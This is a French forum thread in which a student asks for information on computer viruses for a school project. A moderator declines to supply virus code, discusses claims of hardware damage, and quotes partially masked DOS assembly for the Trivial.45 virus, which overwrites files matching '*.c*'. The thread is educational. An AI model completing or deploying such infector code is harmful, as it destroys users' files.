Projet Tutoré : Virus informatiques
Affichage des résultats 1 à 4 sur 4

Projet Tutoré : Virus informatiques



  1. #1
    invite1a99f682

    Bonjour à tous !!!

    Dans le cadre de mon projet tutoré de première année d'I.U.T. je cherche des informations sur les virus : les différentes familles, leurs modes de fonctionnements, leurs développements (dans le cas des virus polymorphes et génétiques) et différents codes sources pour les analyser si possible. Dans la même série, les différents types d'antivirus et leur mode de fonctionnements. Si vous pouviez-me communiquer différents sites intéressants et quelques bouquins (Du Virus à l'Antivurs, de Mark Ludwig par exemple) ce serait cool ...

    Merci d'avance pour votre aide ...

    M.

    -----

  2. #2
    invite37693cfc

    lut,

    c'est le mois du virus sur futura tu ne peux pas mieux tomber...

    lis voir ce dossier

    la deuxieme partie sera encore plus passionante

    ++

  3. #3
    invite1a99f682

    Bonjour !!!

    J'ai entendu parler de virus capables de modifier des paramètres électroniques et de provoqier des court-circuits et des surtensions ... Qu'en pensez-vous ??? Avez-vous des documents sur le sujets ???

    Merci d'avance et @++

    M.

  4. #4
    JPL
    Responsable des forums

    Aucune personne responsable ne te communiquera un code source de virus. Regarde toutefois plus bas.
    En ce qui concerne la possibilité de provoquer des dommages matériels sur un ordinateur, j'avais écrit dans le dossier :
    On a parfois affirmé que des virus pourraient provoquer des pannes matérielles en altérant des circuits électroniques ou d'autres organes (disque dur par exemple). Aucun virus de ce type n'est actuellement connu et rien ne permet d'affirmer que ceci soit techniquement faisable.
    Un correspondant du groupe fr.comp.securite.virus m'a répondu ceci:

    Si c'est faisable. J'ai personnellement cramé un moniteur il y a quelques années. C'est surtout que le matériel actuel est bien plus sûr qu'il y a quelques années et surtout bien mieux "piloté". Tu ne peux plus t'amuser à changer la fréquence de balayage de ton moniteur toutes les 10 ms aujourd'hui, l'OS ou le matériel réagira et l'éteindra. Pareil pour les disques dur. Tu peux facilement t'amuser à déplacer les têtes toujours au même endroit en boucle, ça ne marchera plus. Rien ne dit non plus qu'on ne puisse pas provoquer des dégâts matériel via le processeur, par exemple le faire chauffer...
    Je précise que le truc qui permet d'essayer de fausser le mécanisme du bras du disque dur par une agitation frénétique est connu depuis longtemps mais n'a pas été utilisé à ma connaissance par un virus. De toutes façon cela ferait un bruit tellement significatif que l'utilisateur arrêterait son ordinateur avant tout dégât.
    Un autre correspondant m'a donné le code partiellement censuré d'un des virus de la famille Trivial, qui ne fait après compilation en binaire que 45 octets !
    45 octets: VIRUS.COM Infection: Trivial.45 (generic)

    J'ai camouflé quelques chiffres afin que les personnes sans
    connaissances en assembleur ne puissent pas créer un fichier exécutable.


    mov ah, xxh
    lea dx, filemask
    int 21h
    jc @@2

    @@1:
    mov ax, yyyyh
    mov dx, xxh
    int 21h

    mov bx, ax
    mov ah, xxh
    mov dx, 100h
    mov cx, 45
    int 21h

    mov ah, xxh
    int 21h

    mov ah, xxh
    int 21h
    jnc @@1

    @@2:
    ret
    filemask db '*.c*',0
    Rien ne sert de penser, il faut réfléchir avant - Pierre Dac

  5. A voir en vidéo sur Futura

Discussions similaires

  1. Projet tutoré : panneaux rayonnants
    Par invite2ca8ede3 dans le forum Habitat bioclimatique, isolation et chauffage
    Réponses: 4
    Dernier message: 20/11/2007, 18h11
  2. Projet tutoré
    Par inviteb459ce8c dans le forum Électronique
    Réponses: 3
    Dernier message: 23/03/2006, 16h23
  3. Projet individuel tutoré
    Par invite1e4bb940 dans le forum TPE / TIPE et autres travaux
    Réponses: 0
    Dernier message: 03/01/2006, 16h28
  4. aide TPE 1è S peut on comparer les virus informatiques aux virus biologique?
    Par invite9b03bd15 dans le forum TPE / TIPE et autres travaux
    Réponses: 13
    Dernier message: 20/11/2005, 10h13
  5. projet tutoré ALCHIMIE
    Par invite5b9373fc dans le forum TPE / TIPE et autres travaux
    Réponses: 5
    Dernier message: 25/10/2004, 09h12